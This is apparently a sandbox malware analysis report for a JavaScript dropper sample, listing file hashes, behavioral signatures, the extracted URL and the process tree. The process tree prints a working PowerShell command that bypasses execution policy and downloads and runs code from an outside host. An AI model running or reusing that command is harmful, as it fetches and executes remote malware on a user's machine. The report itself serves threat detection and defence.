Analysis
-
max time kernel
140s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
23-01-2024 05:27
Static task
static1
Behavioral task
behavioral1
Sample
in_67226722367226722.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
in_67226722367226722.js
Resource
win10v2004-20231215-en
General
-
Target
in_67226722367226722.js
-
Size
39KB
-
MD5
2cabe93683e4535d83dcf52a65ebc346
-
SHA1
f4e7e84f88ed5ebe3d0e194d2575e02fec8f6a64
-
SHA256
9091a92935f469f8420312270a3b12ff519ed0f840e42324f2ecdb0a660b2f1d
-
SHA512
bbfc3dcd0c1483569738a21dbb2162f7be90f18b6edd3a894296450477d618b10f56e11c4a08d8b70aade93b31f066403793b399044a038fd2d0bf8440d48626
-
SSDEEP
768:lH7QeMV8mjOil1SoVjVjdbeBywz0J8choA37jygvBw3OvKClNhM1tbji3nsGxQmo:R7QeI/0+xwsB0b8rC
Malware Config
Extracted
https://xerixwebstudio.com/documents.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 15 4584 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4584 powershell.exe 4584 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4584 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 1576 wrote to memory of 4584 1576 wscript.exe 88 PID 1576 wrote to memory of 4584 1576 wscript.exe 88
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\in_67226722367226722.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://xerixwebstudio.com/documents.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82